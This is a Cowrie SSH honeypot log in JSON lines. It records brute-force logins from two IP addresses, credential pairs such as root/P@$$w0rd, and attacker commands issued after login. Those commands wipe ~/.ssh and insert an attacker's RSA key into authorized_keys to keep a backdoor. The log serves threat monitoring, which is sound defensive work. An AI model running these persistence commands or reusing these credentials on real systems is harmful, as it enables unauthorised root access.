{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.379008Z","src_ip":"212.227.235.229","session":"3947c7a9f815"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.720962Z","src_ip":"212.227.235.229","session":"737cb82b8b57"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:55.093613Z","src_ip":"212.227.235.229","session":"3947c7a9f815"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:56.261792Z","src_ip":"212.227.235.229","session":"737cb82b8b57"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:56.262974Z","src_ip":"212.227.235.229","session":"3947c7a9f815"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54682,"dst_ip":"1.2.3.4","dst_port":22,"session":"90cb38c84a32","protocol":"ssh","message":"New connection: 212.227.235.229:54682 (1.2.3.4:22) [session: 90cb38c84a32]","sensor":"my-vps","timestamp":"2025-09-09T06:23:56.454422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:56.457644Z","src_ip":"212.227.235.229","session":"90cb38c84a32"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:56.638547Z","src_ip":"212.227.235.229","session":"90cb38c84a32"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:57.366437Z","src_ip":"212.227.235.229","session":"90cb38c84a32"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:57.545353Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:57.557252Z","src_ip":"212.227.235.229","session":"90cb38c84a32"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:57.647635Z","src_ip":"212.227.235.229","session":"737cb82b8b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55270,"dst_ip":"1.2.3.4","dst_port":22,"session":"80343da2918e","protocol":"ssh","message":"New connection: 212.227.235.229:55270 (1.2.3.4:22) [session: 80343da2918e]","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.016784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.017584Z","src_ip":"212.227.235.229","session":"80343da2918e"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":55990,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab943752bb9","protocol":"ssh","message":"New connection: 157.20.207.165:55990 (1.2.3.4:22) [session: 2ab943752bb9]","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.019561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.020281Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.203581Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.394981Z","src_ip":"212.227.235.229","session":"80343da2918e"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rd","message":"login attempt [root/P@$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:58.979864Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:59.362982Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:59.363776Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:59.364883Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:59.549226Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:24:00.040210Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.041083Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.103764Z","src_ip":"212.227.235.229","session":"80343da2918e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.226872Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.227857Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":55998,"dst_ip":"1.2.3.4","dst_port":22,"session":"9481ede9ef1e","protocol":"ssh","message":"New connection: 157.20.207.165:55998 (1.2.3.4:22) [session: 9481ede9ef1e]","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.410247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.411232Z","src_ip":"157.20.207.165","session":"9481ede9ef1e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.496781Z","src_ip":"212.227.235.229","session":"80343da2918e"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.499277Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:24:00.595297Z","src_ip":"157.20.207.165","session":"9481ede9ef1e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:01.386737Z","src_ip":"157.20.207.165","session":"9481ede9ef1e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:02.573256Z","src_ip":"157.20.207.165","session":"9481ede9ef1e"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":40778,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd0cd88ffbbd","protocol":"ssh","message":"New connection: 157.20.207.165:40778 (1.2.3.4:22) [session: dd0cd88ffbbd]","sensor":"my-vps","timestamp":"2025-09-09T06:24:02.755814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:24:02.757126Z","src_ip":"157.20.207.165","session":"dd0cd88ffbbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:24:02.941500Z","src_ip":"157.20.207.165","session":"dd0cd88ffbbd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:03.716787Z","src_ip":"157.20.207.165","session":"dd0cd88ffbbd"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:03.901643Z","src_ip":"157.20.207.165","session":"2ab943752bb9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:03.902881Z","src_ip":"157.20.207.165","session":"dd0cd88ffbbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57872,"dst_ip":"1.2.3.4","dst_port":22,"session":"a29c13f68f57","protocol":"ssh","message":"New connection: 212.227.235.229:57872 (1.2.3.4:22) [session: a29c13f68f57]","sensor":"my-vps","timestamp":"2025-09-09T06:24:12.968401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:12.969512Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:13.384043Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.login.success","username":"root","password":"....","message":"login attempt [root/....] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:14.979633Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:24:15.851854Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:24:15.852547Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:24:15.853589Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:16.637014Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:24:17.086237Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 